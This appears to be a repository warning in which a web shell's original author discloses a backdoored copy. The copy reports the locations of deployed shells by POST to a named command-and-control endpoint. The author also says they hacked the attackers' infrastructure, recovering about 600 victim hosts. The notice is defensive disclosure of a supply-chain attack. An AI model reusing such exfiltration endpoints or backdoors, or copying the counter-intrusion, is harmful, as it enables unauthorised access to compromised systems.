Description
Hi,
This repository is a copy of my original project:
https://github.com/0xP1ckl3d/p1ckled_web_shell
The code here has been modified from my original to include a malicious backdoor.
Specifically, it sends the URL location of all deployed web shells to a command-and-control server via:
POST https://r00t-shell.com/logs/log.php
Anyone who has deployed one of these modified web shells should be aware that the threat actor behind this repository now knows the location of the shell and has likely used that information to upload additional malicious payloads to the compromised systems.
The group responsible appears to be based in Russia. They are not particularly sophisticated — I was able to compromise their infrastructure and recover a full list of affected URLs (approx. 600 hosts).
This is a clear example of a supply chain attack. Please ensure you fully understand the source and behaviour of any code before using it, particularly in client environments.
Stay safe,
0xP1ckl3d